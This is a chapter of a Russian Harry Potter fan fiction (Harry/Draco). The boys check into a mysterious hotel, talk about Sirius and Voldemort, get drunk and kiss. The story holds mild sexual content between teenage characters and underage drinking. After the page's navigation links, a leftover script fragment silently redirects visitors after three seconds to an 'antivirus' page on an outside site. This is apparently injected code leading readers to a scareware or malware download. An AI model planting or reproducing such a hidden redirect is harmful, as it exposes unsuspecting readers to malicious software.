Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 12. Отель на вересковых холмах

(Глава, в которой для всех готов и стол и кров, Гарри получает ответ на вопрос, а Драко боится не оправдать ожиданий)

Драко нравилось, что Поттер слушает его, нравилось нетерпеливое «ну, а дальше?». Он купался в теплых лучах внимания, чувствуя себя интересным рассказчиком.

- Я пошел с ними в комнату на втором этаже, между прочим, ужасно пошло обставленную. Там мы устроились на диване и начали… разговаривать. Беседа была вполне невинная, вот только потом девушки увидели мою метку. Оказалось, для них это означало, что я зло и меня надо уничтожить… Они начали превращаться в черный туман, так что, сам понимаешь, времени на раздумья у меня не было, пришлось действовать быстро. Я обнаружил за портьерами выход в длинный коридор, по нему и побежал. А в конце меня ждал Сириус Блэк. Он оказался моим помощником, представь себе.

- Постой! Сириус?! Ты видел Сириуса?

Поттер резко остановился и уставился на него. Драко показалось, что в тусклом свете масляного фонаря глаза спутника возбужденно заблестят.

- Ну видел, видел… Так вот… Сириуса Блэка… Он оказался моим помощником…

- Сириус? Твой помощник? Ну и как он помог? Что сделал? Что сказал?

- Поттер… Прости, но я рассказывал… - Драко сделал паузу, затем продолжил: - Так вот. Он сказал, что за мной гонится карающий туман и собирается убить меня. Это, естественно, я уже понял. Я спросил у Блэка, как открыть дверь, но он сказал, что она будет закрыта до тех пор, пока у меня есть метка. И надо отрубить мне руку, – Драко посмотрел на спутника. - Ты спрашивал, что он сделал? Так вот – он ее отрубил.

Об обмороке Драко умолчал и, украдкой взглянув на шрам, который сейчас показался ему особенно уродливым, торопливо расправил рукав.

- Сириус? Отрубил тебе руку? – удивился Гарри.

Слизеринец пожал плечами:

- Да, отрубил. Топором.

- Из-за метки?

Драко поджал губы.

- Да, да, я же сказал.

- Сириус. Ну надо же! Здесь! И почему он не мой помощник… - пробормотал Гарри. - Надо же. Больно было?

- Глупый вопрос, - опустив глаза, ответил спутник.

- Ну да.

Гарри хотел еще поговорить о Сириусе, но не стал.

- Хочешь воды? – спросил он вместо этого.

Слизеринец сухо кивнул, и Гарри протянул ему флягу.

- Спасибо, - Драко снова кивнул и приник к горлышку. Он пил прикрыв глаза, чуть откинув голову – словно не пил вовсе, а целовался. Это зрелище отчего -то смутило Гарри. Он отвел взгляд, заставляя себя думать о поисках ночлега. За кругом оранжевого света виднелись кирпичные стены домов и черные отверстия окон, похожие на пещеры. Было тихо, только ночные бабочки с шуршанием бились о стекло лампы над головами мальчиков.

- Спасибо, – хрипло сказал Драко.

Гарри поднял глаза. Слизеринец вытер ладонью губы и протянул ему флягу. Гарри смущенно улыбнулся: - Не за что. Идем?

- Идем.

Мальчики пошли рядом по узкой улице. Оба не спали вторые сутки, а о сне почему-то не думалось. Густой запах вереска волновал, и мягкая, синяя ночь вокруг больше не казалась им мрачной, она будоражила, заставляла снова и снова вспоминать торопливый, неловкий поцелуй. Гарри решил, что Малфой еще ни с кем не целовался: слишком уж широко он открывал рот, слишком рьяно подавался навстречу. Но все равно этот поцелуй был самым желанным в жизни гриффиндорца. Украдкой взглянув на спутника, он заметил, что тот рассеянно и ласково улыбается, словно баюкает что-то внутри себя. Удивительно было видеть его таким. Отвернувшись, Гарри глубоко вдохнул теплый сладкий воздух и вдруг рассмеялся.

Драко посмотрел на него удивленно, но промолчал. Ему самому хотелось хохотать. Кончиками пальцев он коснулся шрама на верхней губе, оставшегося от сектумсемпры, а теперь ставшего крошечным символом Поттера. Его меткой, тавро. Кожу вокруг рта саднило – Поттер давно не брился – но Драко никогда не испытывал ничего прекраснее. Даже просыпаясь утром в день рождения в залитой солнцем комнате, когда папа с мамой будили его, переглядываясь таинственно, он не чувствовал себя лучше. Похожее радостное предвкушение переполняло его. Поттер был так красив, что слизеринец мог смотреть на него вечно, не отрываясь. Улица сонно дышала, на чистом небе зажглись близкие звезды, и так уютно было идти бок о бок в живой ночной тишине.

В молчании мальчики вышли на площадь и увидели подсвеченное гирляндами разноцветных лампочек длинное пятиэтажное здание с башнями. Оно возвышалось над серыми просевшими домами, как статная красавица над уродливыми сестрами. Издалека видна была вывеска: «Отель на вересковых холмах».

- Его тут не было, - удивился Гарри, и слизеринец кивнул, соглашаясь.

Они переглянулись и зашагали через площадь к отелю. Над козырьком развивались флаги, каких стран – Драко не смог рассмотреть. Когда мальчики подошли к подъезду, двери открылись сами собой, и спутники оказались в заставленном мебелью холле, в котором сейчас была только длинноволосая женщина-портье. Облокотившись на стойку, она курила сигарету и с тоской смотрела куда-то на стену между портретом королевы Елизаветы и напольными часами. На фоне отбеленной накрахмаленной рубашки ее кожа казалась желтой, под глазами залегли глубокие тени.

- Добрый вечер. Сколько стоит номер? - спросил Гарри. Портье встрепенулась и уставилась на мальчиков.

- На ночь?

Гриффиндорец кивнул.

- Двадцать фунтов, – бросила она.

Гарри посмотрел на Малфоя. Малфой ответил ему удивленным взглядом, явно не понимая, что такое фунты.

- Но у нас нет фунтов.

Девушка равнодушно пожала плечами:

- А что у вас есть?

- Секунду, - сказал Гарри и, взяв слизеринца под локоть, отвел его в сторону.

- У нас ничего нет, - произнес тот голосом, в котором слышались истерические нотки.

- Погоди, - Гарри порылся в карманах, потом открыл мешок, вытащил мантию-невидимку, флягу и завернутые в бумагу пироги. Кажется, больше внутри ничего не было.

- И что нам отдать? Мантию? А может флягу? И как мы будем без воды? – бормотал Малфой. Гарри раздраженно взглянул на него, и тут пальцы нащупали что-то твердое и холодное. Не веря такой удаче, Гарри вытащил из мешка монету в двадцать галеонов.

- Ничего себе! – воскликнул слизеринец.

Гарри улыбнулся, с благодарностью вспоминая Дамблдора.

- Ну вот. Не стоит падать духом раньше времени.

Он подошел к стойке и положил перед портье золотую монету.

- Этого хватит?

- Пожалуй, еще и на ужин и завтрак в номер, – ответила она, с любопытством разглядывая галеон.

- Это за двоих.

- Само собой.

Женщина дала ему бланк регистрации, заполнив который, гриффиндорец получил ключ с металлическим брелком.

- Прошу!

- Спасибо, - пробормотал Гарри.

Мальчик-посыльный проводил их до номера. Весь путь до второго этажа Драко проделал в молчании. Его отхватило беспокойство: все вокруг показалось враждебным и неестественным, словно он следил со стороны за событиями какой-то пошлой драмы - и вдруг понял, что был главным действующим лицом. Однако комната оказалась чистой, теплой и уютной. Обстановка была роскошная: большая кровать с балдахином, круглый стол, тумбочка, два кресла, старинный комод с высокой вазой, повсюду свечи в глиняных блюдцах. Драко немного воспрял духом: по сравнению с неприветливой темнотой за окном тут было неплохо. Но вот кровать заставляла его нервничать. Когда слизеринец увидел ее, в голове сразу вспыхнуло слово «облажаться». Слово, которое так ненавидели родители, слово, за которое оставляли без сладкого, плебейское, маггловское слово - оно так точно передавало суть его маленькой проблемы. Драко понял, что не может облажаться перед Поттером, что должен понравиться ему, должен сделать все идеально, без глупых ошибок и нелепых случайностей. Тревога снова заворочалась внутри.

- Нормально. А ты что скажешь? - Гарри посмотрел на слизеринца.

- Неплохо. Может быть немного кричаще, но, видимо, во всем городе со вкусом неважно, так что… - Драко делано улыбнулся. Гриффиндорец улыбнулся в ответ, а затем подошел к окну и задернул шторы.

- Надо все тут осмотреть… На всякий случай… Чтобы убедиться, что это не испытание, - объяснил он, опускаясь на колени и заглядывая под кровать. Драко пожал плечами. Гарри осматривал ящики комода, тумбочку, пространство под креслами и за креслами, а Драко ходил за ним по пятам, останавливаясь за спиной и подсматривая через плечо. Гарри слышал его шаги и шумное дыхание, оборачиваясь, мог видеть заострившееся от любопытства лицо. Гриффиндорцу вдруг стало весело. Развернувшись, он притянул к себе Драко и поцеловал. В голову ударила горячая волна, на какое-то время все вокруг потеряло значимость, но как только Гарри отстранился, слизеринец быстро заговорил:

- Надо еще ванну проверить.

- Хм… Точно… - Гарри почувствовал, как горят щеки. - Давай осмотрим.

Номер оказался совершенно безопасным. Более того, в нем была огромная ванна, круглый стол, накрытый к ужину, и полевые цветы в вазе.

- Вот это да, - протянул Гарри, с благоговением рассматривая расставленные на столе блюда и бутылки.

- Интересно, тут всех гостей так встречают? – Усевшись в кресло, Драко усмехнулся: - Жаль, нет Королевы, мы бы с ней посоревновались в искусстве дегустации.

Гарри пожал плечами.

- Мне все равно, что пить.

Слизеринец взял со стола чайную ложку и принялся крутить в пальцах.

- Ну и напрасно. Хотя не все разбираются. Папа говорил, что для этого необходима порода. То есть я не хочу сказать, что у тебя нет породы, но… - он бросил ложечку на стол, - серебро, кстати.

Гарри промолчал, не желая говорить о том, в чем ничего не смыслит. Ситуация вдруг напомнила ему их первую встречу в магазине Мадам Малкин, когда Малфой доставал его разговорами о квиддиче, факультетах, настоящих волшебниках.

- Выпьем? – спросил слизеринец, манерно растягивая гласные. Гарри посмотрел на него: Драко сидел очень прямо, в его взгляде и улыбке было что-то натянутое.

- Ну давай, - ответил он осторожно. - Хотя я сначала принял бы ванну.

- О! – Драко прикусил губу. - Ну тогда иди. Я тебя подожду.

Пытаясь немного подбодрить его, Гарри улыбнулся.

- Хорошо.

На языке вертелось шутливое предложение присоединиться, но он решил не рисковать, не желая смутить Малфоя еще сильнее. Он ушел в ванную и прикрыл дверь. Просторная комната вновь поразила его своей роскошью: высокие потолки с лепными львами и ангелами, французское окно, медные краны, на крючках - мягкие пушистые простыни и халаты, а на полках в разноцветных банках - шампунь, мыло, пена, масло. И повсюду горели свечи. Включив воду погорячее, Гарри быстро разделся и залез в ванну. Вода лилась с мягким шипением, красные отблески играли на медных ручках кранов, на занавесках плясали синие вышитые стрекозы. Несмотря на роскошь, тут было очень уютно. Расслабившись, Гарри закрыл глаза и представил, как обнимает Малфоя, целует его по-настоящему, долго и глубоко, касается без стеснения, чувствует его жар. Эти мысли взволновали мальчика. Тяжело вдыхая густой пар, он погладил было себя скользкой ладонью, вниз-вверх, но нехотя разжал пальцы. Надо было остановиться, иначе он мог не сдержаться. Открыв глаза, Гарри выпрямился и потянулся к бутылочке красного цвета, в которой оказался шампунь с запахом персика. Помывшись, гриффиндорец наспех вытерся, накинул халат и вернулся в комнату. Малфой сидел за столом, все такой же прямой и напряженный; барабаня пальцами по столу, он сверлил взглядом наполненный до половины бокал, а услышав шаги, резко обернулся.

- Ты все? – спросил он.

- Как видишь.

- Ладно. Тогда я пойду, – Драко медленно встал. - Ну, не скучай тут без меня.

- Постараюсь, – усмехнулся Гарри.

Слизеринец секунду смотрел на него, а затем скрылся в ванной комнате. Покачав головой, Гарри сел за стол и положил себе салата.

Заперев дверь, Драко наполнил ванну и погрузился в воду. Вдруг навалилась невыносимая усталость, и, не в силах отвести взгляд и пошевелиться, он уставился на коричневую ночную бабочку, сидевшую на белой занавеске. Что-то вспугнуло ее, и она заметалась по комнате. Драко вздохнул - внутри у него трепыхались сотни таких же ввергнутых в панику мотыльков, он хотел Поттера так давно и так мучительно, что это желание не могло осуществиться, не ранив его, не сломав в нем чего-то важного.

«Так, хватит», - приказал он себе, и, схватив первую попавшуюся банку, вылил на ладонь немного мыла. Он начал мыться, совершая привычные действия с какой-то преувеличенной тщательностью, а закончив, быстро сполоснулся и вылез. Ступив на коврик, Драко повернулся к зеркалу у вешалки и увидел себя в полный рост: острые колени, выпирающие ребра, порозовевшее после ванны острое лицо – как мог он понравиться Поттеру? Сняв с вешалки халат и надев его, Драко пригладил волосы, завязал потуже пояс, чуть-чуть приподнял воротник. Вроде ничего. Он прикрыл глаза и посмотрел на себя, томно улыбнувшись отражению, потом поднял подбородок и тихо застонал. Выгнув спину, провел рукой по животу. Это должно понравиться. Так он выглядел соблазнительным. Именно соблазнительным. Может быть и не красивым, но страстным. Драко кивнул своему отражению и медленно отворил дверь. В комнате было прохладно. Окно было приоткрыто, и ветер едва заметно теребил штору. Поттер сидел в кресле и ел яблоко. Ворот халата распахнулся, открывая смуглую грудь - слизеринец рассмотрел длинный шрам от шеи до темного соска, а затем невольно перевел взгляд ниже. Воображение дорисовало линию от пупка, завитки темных волос. Стараясь скрыть смущение, Драко поспешно сел и подвинул поближе свой бокал, прячась за ним.

- Ну, теперь тебе налить?

Драко не смог придумать лучшего начала беседы. Нужно было о чем-то разговаривать, но внезапно голова стала совершенно пустой. Он попытался взять бутылку левой рукой, но пальцы дрожали и плохо слушались. Драко чуть не вылил каберне на ковер.

- Черт!

- Аккуратней. Давай я, - Поттер торопливо вскочил и отобрал бутылку.

- Не стоило беспокоиться, - сухо отозвался слизеринец, бросив взгляд на свое отражение в кофейнике. Собственное лицо показалось ему несовершенным, слишком тонким, слишком нервным, слишком острым, и Драко быстро опустошил свой бокал, а затем подвинул его Поттеру.

- Положить тебе? - спросил гриффиндорец, указывая ложкой на блюдо с цыплятами.

- Да, - собственный голос показался Драко слишком высоким. - Только немного, я не голоден.

Гарри удивился, но промолчал и покорно положил Малфою поджаристое бедрышко.

Какое-то время мальчики ели молча. Гриффиндорец поймал себя на мысли, что малфоевская манера есть раздражает его. Казалось, тот делает это нарочито медленно и манерно, так же, как говорит. Гарри не мог знать, с каким трудом Драко дается каждый кусок.

- Рука не болит? – покончив с цыпленком, спросил гриффиндорец.

- Как ни странно, нет.

Драко положил вилку. Его цыпленок остался почти не тронутым, зато бокал опустел.

- Еще вина?

- Пожалуй.

Гарри налил.

- Такие вина хороши к птице, - выпив, сказал Драко.

- Здорово. - Вздохнул собеседник.

Мальчики замолчали. Тишина звенела в ушах, и Драко боялся сглотнуть. Подняв глаза, он понял, что Поттер смотрит на него. Взгляд гриффиндорца будоражил: пристальный, жадный – девушки не умеют так смотреть. Драко смутился и начал внимательно изучать пейзаж над комодом, изображавший вересковую пустошь.

- У тебя теперь нет метки? – спросил, наконец, Гарри.

- Нет.

- Как Волдеморт к этому отнесется?

Слизеринец провел пальцем по краю бокала. Забавно, но он совершенно не подумал об этом.

- Не знаю. Наверное, убьет меня.

- Он не сможет тебя вызвать.

- Да, но когда я попал сюда, меня как раз вели к нему.

- К Волдеморту?

- Ага.

Драко снова посмотрел на свое отражение в начищенном боке кофейника, контуры слегка расплывались, сливаясь с огоньками свечей.

- Но, может быть, я и не попаду к нему. Может быть, кто-нибудь поможет мне сбежать.

Гарри отодвинул тарелку.

- Вот как? И кто?

Слизеринец усмехнулся. Вино в бокале снова закончилось, а Драко не заметил, когда допил его.

- Это не имеет значения. Собственно, я и сам не уверен.

В складках штор уютно залегли тени, в комнате пахло воском и сладким вином. При свете свечей кожа гриффиндорца казалась бархатной, и Драко вдруг понял, что хочет положить голову на его плечо, засунуть руку за отворот халата, обнять, уткнуться носом в густые жесткие волосы, вдохнуть их запах. Хочет греть ладонь о его горячую кожу, говорить беспомощные глупости, или молчать, а не отвечать на вопросы о Волдеморте, от которых становилось холодно и одиноко и ночь за окном казалось еще темнее.

- Может, Снейп?

- Налей, - попросил Драко. - Снейп… Я не знаю, ясно? Я просто видел кое-что, вот и все, но говорить об этом не хочу. Ни к чему это – заранее обсуждать такие вещи.

- Ну хорошо, хорошо.

Смутившись, Гарри снова наполнил бокалы. Мальчики молча выпили.

- Может, еще что-нибудь хочешь узнать? Давай уж покончим с допросом. Спрашивай, – медленно произнес слизеринец.

- Прости, – Гарри неловким движением откинул со лба отросшую челку, - но мне надо знать, понимаешь. У меня всего несколько вопросов. Ну вот, например, что ты видел в лабиринте?

Слизеринец улыбнулся.

- Предсказуемо. Я видел… Так… по порядку… Я видел Снейпа, который с кем-то разговаривает, видел себя, идущего на вызов Лорда. Еще я видел, как пытаюсь украсть порошок слепоты, он был нужен мне для побега. Вот и все. Ничего важного.

- Точно?

- Абсолютно.

- С кем разговаривал Снейп?

Драко вздохнул.

- С какой-то женщиной. Не рассмотрел с кем именно, на ней был плащ.

- Еще вопрос.

- Ну!

- Что случилось с тобой сразу после побега из Хогвартса?

- Это был не побег! Ну, или побег… В общем, сразу после мы аппарировали в поместье Лестранжей, где нас ждал Лорд, – Драко сделал большой глоток вина. - Ну так вот. Темный Лорд, он скрывался в этом поместье. По крайней мере, мне показалось, что он жил там постоянно. Меня они держали внизу, в казематах. Меня и других… пленников. Ну вот. И он ждал нас с этого задания в главном зале. Там потом проходили все его… собрания.

- Точно, - пробормотал Гарри задумчиво, - Лестранжи.

- Что?

- Да это я так. Извини. Продолжай.

Драко потянулся здоровой рукой к бутылке и быстро наполнил свой бокал.

- Потом нас привели в комнату. Я еще запомнил почему-то эклеры, они там на столе в вазе лежали. Я посмотрел на них, а потом сразу упал. Темный лорд должен был наказать нас. Меня. Потом приказал всем выйти, оставил только меня. Я думал, что снова получу Круцио, но Лорд начал говорить, что читал мысли, которые я пытался скрывать от него. Что он уверен, ты – всего лишь глупый мальчишка, а никакой не великий маг. Что напрасно я поверил старику, Дамблдору то есть, будто у тебя есть особенная сила, и все такое. Что ты не убьешь его, так как у него есть то, что всегда при нем, и он никогда не позволит тебе до этого добраться. И у его ног все время лежала эта змея, а когда он замолчал, она подползла ко мне. В общем, приятного мало.

Драко вымученно улыбнулся, ему не хотелось говорить об этом дне. Из дней, наполненных страхом, тоской и болью, этот запомнился лучше всех, и, вспоминая его, слизеринец каждый раз переживал тот же ужас что и тогда.

- Значит, чаша Хельги Хаффлпафф хранится в замке Лестранжей?

- Что? Чаша? – переспросил Драко.

- Чаша, о которой говорила Беллатрикс. Ты рассказывал, – прожевав, напомнил Гарри. Драко посмотрел ему в глаза.

- Да, что-то припоминаю. Речь шла о каком-то сосуде. Тетка говорила, что он хранится у нее, и это значит, что Лорд ей доверяет, - сказал слизеринец. Свечи плыли, раздваиваясь, рисуя бело-желтые линии, и он понял, что уже пьян.

- Понятно, - сказал Гарри. - Значит, вы со Снейпом сразу перенеслись в поместье Лестранжей? После побега?

- Конечно. Я же только что рассказывал! – с досадой воскликнул мальчик.

- А Снейп тоже жил в поместье? И чем вы там занимались? – спросил Гарри, рассматривая собеседника. Его лицо казалось молочно-белым, а глаза – темными и влажными под правильными дугами бровей.

- Снейп... О господи, когда же твои вопросы закончатся? Нет, не жил он с нами, он только приезжал готовить зелья. А может еще за чем, я не в курсе. – Драко закинул ногу на ногу и подпер щеку ладонью. - Поттер, хватит об этом. Неужели мы не можем говорить о чем-то поинтересней?

- Например?

Гарри в упор посмотрел на слизеринца. Кажется, тот опьянел.

- Что там творилось без меня в Хогвартсе?

- Дамблдора похоронили. Знаешь, я рад, что его убил не ты.

- Рад? – Драко горько усмехнулся. - Из-за него убили моих родителей.

- Из-за него?

- Из-за того, что я его не убил, – уточнил Драко, заправляя челку за ухо. - Сам подумай, кто мне дороже – он или они?

- Нда, - тут Гарри не мог ему возразить.

- О чем еще поговорим? Может, о квиддиче? Слизеринец сделал большой глоток и задержал вино во рту. Когда он так делал за столом, мама всегда укоризненно смотрела на него, но сейчас приличия не имели значения.

- А что о нем говорить? Я давно не играл, - отчего-то смутившись, Гарри пожал плечами и залпом допил оставшееся в бокале вино. Слизеринец видел, как скользнул под кожей острый кадык.

- Может, побреешься? – внезапно предложил Драко.

- Что?

- Что, что! Поттер, тебе надо побриться! Ты такой колючий, - сказал Драко и вдруг засмеялся. Он хохотал и никак не мог остановиться, словно со смехом выходило напряжение последних дней.

- Что тут смешного? – улыбаясь немного нервно , пробормотал Гарри. - Нечем тут бриться! Все есть, а бритвы нет.

- Ах, какая жалость, - сквозь смех выговорил Драко. Гриффиндорец удивленно наблюдал, как Малфой утирает слезы и сдавленно хихикает, прикрыв рот рукой. Странно было видеть его таким веселым, таким простым.

Успокоившись, Драко подпер подбородок ладонями.

- Вино заканчивается.

- Есть шампанское, - Гарри кивнул на зеленую бутылку.

- Давай.

Шампанское почти выдохлось, но гриффиндорец все же наполнил бокалы.

- А мы неплохо играли вместе, - вздохнул Драко. Собеседник кивнул и они чокнулись.

- Отец убил бы меня за это, - сказал он.

- За что?

- За локти на столе, вот за что. Ах, Поттер, ты такой некультурный! Кто-то должен заняться тобой. Вот вспомни, как ты попал впросак у Королевы… Это же все было элементарно!

Гарри пожал плечами. Малфой пристально смотрел на него.

- Налей-ка, - слизеринец расцепил руки и подвинул к собеседнику бокал. Гарри налил еще шампанского.

- Поттер, - выпив, выдохнул Драко. Прозрачная жидкость потекла по подбородку, по шее, и мальчик вытерся отворотом халата. Гриффиндорец схватил салфетку.

- За это родители лишили бы тебя наследства, - пошутил он, вытирая безволосую грудь.

- Поттер, - Драко стиснул запястье гриффиндорца, - поцелуй меня.

В голове шумело, и мальчик закрыл глаза, подставляя губы для поцелуя. Рот Поттера был горячим и мягким, и сердце оглушительно загрохотало в груди. Когда гриффиндорец выпрямился, Драко провел пальцем по его голому животу.

- Знаешь, что неприлично сидеть за столом с голой грудью?

Гарри сглотнул. Ноги вдруг стали мягкими, отказываясь держать его.

- Хочешь, сяду к тебе на колени? – быстро и хрипло спросил Драко. Гриффиндорец кивнул, не в силах ответить, тогда Малфой поднялся и уступил ему место. Устроившись в кресле, Гарри усадил бывшего врага и обнял. Его тяжесть, его близость, запах алкоголя и сладкого шампуня кружили голову.

- Почему ты не побрился? – запинаясь, спросил Малфой.

- В ванной не было бритвы, - повторил Гарри, глядя на то, как слизеринец берет бутылку и отпивает из горла.

- А, да… точно… Я уже спрашивал… - протянул Драко, и, пьяно хихикая, уронил голову ему на плечо. Бутылка упала на ковер.

- Спрашивал, - Гарри погладил слизеринца по волосам, потом провел рукой по мягкой ткани халата. Пальцы дрожали. Вдруг Драко резко вскинул голову и чуть не свалился на пол - Гарри едва удержал его.

- Щекотно, – пробормотал тот.

- Извини, - гриффиндорец улыбнулся с неожиданной нежностью и осторожно убрал с лица Малфоя легкую челку. Тот зажмурился, а затем, наклонившись, вытащил из-под стола бутылку.

- Ууу... Пустая, - протянул он ибросил ее обратно. – Поттер, у меня есть опыт в этих делах, понял? И не надо меня жалеть! - Малфой сонно ткнулся носом в ворот его халата, так что Гарри пришлось спихнуть школьного врага с коленей и, поддерживая, отвести к кровати.

- Идем-ка в постель.

- Оооо… Поттер, - хихикал тот, пока Гарри снимал с него халат и накрывал одеялом. - Не можешь ждать, да? – притянув гриффиндорца, он поцеловал его пьяно, влажно, неумело. Гарри не сопротивлялся.

- Ну, давай, Поттер, - пробормотал слизеринец сквозь сон. - Ложись, давай… я тоже тебя хочу…

- Это здорово, - тихо ответил Гарри.

- Нет, правда хочу. Просто немного посплю, а потом… - Драко закрыл глаза, и гриффиндорец понял, что тот спит. Бросив халат в кресло, он обошел кровать и залез под одеяло. Внезапно усталость навалилась с утроенной силой. Какое-то время Гарри слушал дыхание слизеринца и громкий стук своего сердца, а потом и сам уснул

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>